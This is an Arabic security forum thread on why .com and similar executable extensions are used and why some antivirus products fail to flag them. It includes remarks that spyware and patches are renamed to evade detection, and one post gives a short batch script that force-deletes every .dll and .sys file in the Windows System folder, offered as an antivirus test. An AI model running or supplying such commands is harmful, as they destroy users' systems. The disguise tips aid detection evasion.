• [ يمنع ] طرح أي موضوع يحوي على كراكات أو باتشات او كيجنات من غير فحصها عبر موقع فيروس توتال [ virustotal.com ] وطرح رابط الفحص ضِمن الموضوع.

الحالة
مغلق و غير مفتوح للمزيد من الردود.
السلام عليكم

ياليت أحد الاخوان يفيدنا .. لماذا بعض صيغ الملفات تنتهي بـ com

ويعجز عنها النود وبعض المكافحات من فحصها ..

مافائده هذه الصيغه ؟!!
 

توقيع : protection
السلام عليكم

ياليت أحد الاخوان يفيدنا .. لماذا بعض صيغ الملفات تنتهي بـ com

ويعجز عنها النود وبعض المكافحات من فحصها ..

مافائده هذه الصيغه ؟!!
وعليكم السلام
النود يكشف صيغة com ولكنه لا
يكشف عند الفحص بعض صيغ الملفات لانه لا يتعرف على
طريقة فك ضغطها ولكن بمجرد فتحها يتعرف عليها و يفتك بها :y:
 
توقيع : Mr.Najem
وعليكم السلام
النود يكشف صيغة com ولكنه لا
يكشف عند الفحص بعض صيغ الملفات لانه لا يتعرف على
طريقة فك ضغطها ولكن بمجرد فتحها يتعرف عليها و يفتك بها :y:

أعرف ذالك .. انا أريد مصدر هذه الملفات لماذا يتم أضافتها للعينات وتكون خطيره ..

نحن نعلم عن ملفات التنفيذيه exe وبغالب تكون على هيئة كراك أو باتش لاحد البرامج

اما صيغه com ماهي أستخدامه :i:
 
توقيع : protection
السلام عليكم

ياليت أحد الاخوان يفيدنا .. لماذا بعض صيغ الملفات تنتهي بـ com

ويعجز عنها النود وبعض المكافحات من فحصها ..

مافائده هذه الصيغه ؟!!

عليكم السلام ورحمة الله وبركاته

هلا اخوي كيف حالك اسال الله لك العافية

ملفات تاتي بصيغ com فقط ملفات الباتش التنفيذية هذه الصيغ ميزتها التمويه بالصيغه

يعيبها عدم القدرة على تغيير الايقونة

سهولة الخداع بالصيغة :hh:
 
حبيبي ما ادري للحين الطلبات عندك بالخاص ولاعند احد الاعضاء اذا عندك لاهنت أرســل

نجرب تشكيلة الحماايهـ

والله المفروض كل الي استلم العينة اذا احد من الاعضاء يرسها بس شكلهم كسلوو :p:

تفضل ارسلتها
 
عليكم السلام ورحمة الله وبركاته

هلا اخوي كيف حالك اسال الله لك العافية

ملفات تاتي بصيغ com فقط ملفات الباتش التنفيذية هذه الصيغ ميزتها التمويه بالصيغه

يعيبها عدم القدرة على تغيير الايقونة

سهولة الخداع بالصيغة :hh:

اللهم أمين .. وأياك وكل مسلم ..

يعني هي بالاساس ملفات تنفيذيه مع تغير الصيغه بالاسم ؟! أو ملفات تابعه للباتش يعني مكمله !!

فهمني اكثر :q: << التعب منسيه امور الحاسب
 
توقيع : protection
اللهم أمين .. وأياك وكل مسلم ..

يعني هي بالاساس ملفات تنفيذيه مع تغير الصيغه بالاسم ؟! أو ملفات تابعه للباتش يعني مكمله !!

فهمني اكثر :q: << التعب منسيه امور الحاسب

لا ماهي ملفات تابعه لاي ملف هو اساس باتش بصيغته المعهودة exe

لكن نظرا لسهولة كشف هذه الصيغ نقوم نغير الصيغة لملف تنفيذي عشان يعمل الباتش بدون تعطل

من هذه الصيغ التي يعمل عليها اي ملف تجسس com _scr
 
لكن في الغالب تكون أوامر دوس

sstn8qvcvc9oi71olg9v.jpg


المشكلة ان البعض منها يفشل في فحصه النود + نورتن

وبكذا يقل معدل الكشف لديه في الفحص .. في أي أختبار نجريه
 
توقيع : protection
من استخدمات هذي الصيغه :-

1- يصنع منها ملفات للباتشات التي تزيل الفيروسات لان بعض الفيروسات تضرب كل exe مثل Sality فتستخدم كبديل للـ exe . <<< استخدام شريف :hh:

لمعلومات اكثر اسال زيزوووم لانه صنع اداه بهذي الصيغة لازالة فيروس صيني .

هذا الي اعرفه :q:
 
توقيع : Future Tank X-1
لكن في الغالب تكون أوامر دوس

sstn8qvcvc9oi71olg9v.jpg


المشكلة ان البعض منها يفشل في فحصه النود + نورتن

وبكذا يقل معدل الكشف لديه في الفحص .. في أي أختبار نجريه

صحيح دوس لكن تنفيذي خطر

واذا المكافح ما اكتشفه يجي دور الجدار الناري ان وجد

والا المستخدم عليه بالطرق الاتية

1_ استعمال antifrost
2_ استعمال الهيكس
3_ استعمال TEApplet
4_ اخيرا استخدام مواقع الفحص


 
اللهم أمين .. وأياك وكل مسلم ..

يعني هي بالاساس ملفات تنفيذيه مع تغير الصيغه بالاسم ؟! أو ملفات تابعه للباتش يعني مكمله !!

فهمني اكثر :q: << التعب منسيه امور الحاسب
اسمح لي بالتوضيح بما لدي

هناك امتدادات تنفذية كثيرة تختلف كلا حسب الحاجة وبيئة العمل المراد استخدمه فيها من هذه الامتدادات

bat .scr. exe. com. pif .dll . cox

جميعها تعتبر امتدادات تنفيذية قادرة على خلق تغيرات في النظام او بمعنى اخر انه تستطيع التحكم بالنظام

وكما ذكرة كل امتداد له مميزاته

وخصائصه تختلف حسب عمله والحاجة اليه وهنا بعض المعاني لهذه الملفات

EXE
Executable File
ملف تنفيذي

BAT
Batch File
ملف دفعي

COM
Command File
ملف أوامر



وطريقة عمل بعض هذه الامتدادات هي ان يقوم الويندز بتنفيذ الاوامر الموجود في هذه الملفات !

ارجو ان اكون وضحة هذا ما لدي وهناك ايضا امتدادات dll . shs ايضا تصنف تنفيذية


 
لكن في الغالب تكون أوامر دوس

المشكلة ان البعض منها يفشل في فحصه النود + نورتن

وبكذا يقل معدل الكشف لديه في الفحص .. في أي أختبار نجريه

المشكلة اخي وليد هنا ان هذه الملفات تعتبر من ضمن بئية عمل الويندز نفسها وتكون صعبة الكشف من برامج الحماية لانه تحتاج للتحليل هذه الاوامر لانه اوامر برمجية بالاساس تتحكم بعمل النظام وربما تكون من المستخدم نفسه لكن هناك بعضها يكشف من برامج الحماية بناء على الخطورة التي سوف يلحقها بالنظام واليك مثال

call attrib -h -r c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys

قم بحفظ الملف بمفكرة بامتداد bat ولاحظ رد فعل الكاسبر

هنا الفيرس عبارة عن ملف اوامر لكن هنا الكاسبر يقوم بالحكام عليه بناء على الاوامر المدرجة
call attrib -h -r c:\autoexec.bat >nul هذ السطر ضرورية حتى يتم عمل ملف الاوامر

يمكن تنفيذ الاوامر بشكل عادي من المستخدم لانها اوامر برمجية للنظام فقط لكن هنا من خلال هذا السطر يقوم بكشفها على انه فيروس يقوم هذا السطر نقل الامر (الذى سوفة نكتبة بعد ذلك) الى ملف اسمة autoexec.bat في النظام هذا والعلم عند الله

 
هـذي نتيجة الفحص عندي بالكاسبر انترنت سيكيورتي 8.0.0.506 والاعدادات تــبع زيزوووم حبيب الشعب تركي


i10752_.jpg
 
توقيع : الماستر

أحد الاخوة يرسل العينة
 
توقيع : amir atta
تم أرسال العينهـ للأخ (amir atta)

ننتظر النتايج
 
توقيع : الماستر
السلام عليكم
ارسلوا شباب الله يحفظكم
 
توقيع : bonif1
وعليكم السلام ورحمة الله وبركاته

دزه ع الخاص ياحبيب ألبي
 
توقيع : abwem
bonif1;عباده عيساوي;abwem
تمـ
 
توقيع : الماستر
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى